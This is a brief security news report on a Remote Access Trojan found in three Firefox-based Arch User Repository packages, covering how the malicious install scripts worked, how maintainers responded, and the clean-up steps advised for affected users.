Arch Linux users have been urged to delete several community-maintained Firefox-based browser packages following the discovery of malware in the Arch User Repository (AUR). Security researchers and Arch maintainers identified multiple packages that were distributing a Remote Access Trojan (RAT), prompting swift action to mitigate the threat.
Discovery of Malicious Packages
The affected packages—firefox-patch-bin, librewolf-fix-bin, and zen-browser-patched-bin—were uploaded to the AUR on July 16, 2025, and remained available for approximately 46 hours before being taken offline on July 18. All three packages were found to execute malicious code at installation, silently infecting systems with a modified variant of the CHAOS Remote Access Trojan (RAT).
These packages are forks or customized builds of Mozilla Firefox, aimed at offering additional features or improved user privacy. Given their appeal to security-conscious users, the compromised versions were particularly insidious.
Attack Vector and Functionality
The malware was introduced via installation scripts embedded within the PKGBUILD files of the packages. These scripts fetched and executed additional payloads from a GitHub repository controlled by the attacker. Once deployed, the malware established persistent remote access to the user’s system, granting the attacker full control.
The use of a public repository and open-source build scripts meant there were no immediate red flags — unless a user manually inspected the code before installation. While the AUR is a cornerstone of Arch Linux’s ecosystem, it is also decentralized and relies heavily on community vigilance rather than automated security vetting.
Official Response and Recommendations
The Arch Linux team responded quickly by removing the malicious packages and issuing a formal security advisory. Users who installed any of the compromised packages are being advised to:
- Immediately uninstall the affected packages
- Reboot their systems
- Audit system activity and logs for suspicious behavior
- Change all passwords and invalidate session tokens
- Consider performing a clean system rebuild from trusted sources
The Arch community has reiterated the long-standing guidance to review PKGBUILD files and associated scripts prior to installation, particularly for high-risk applications such as web browsers.
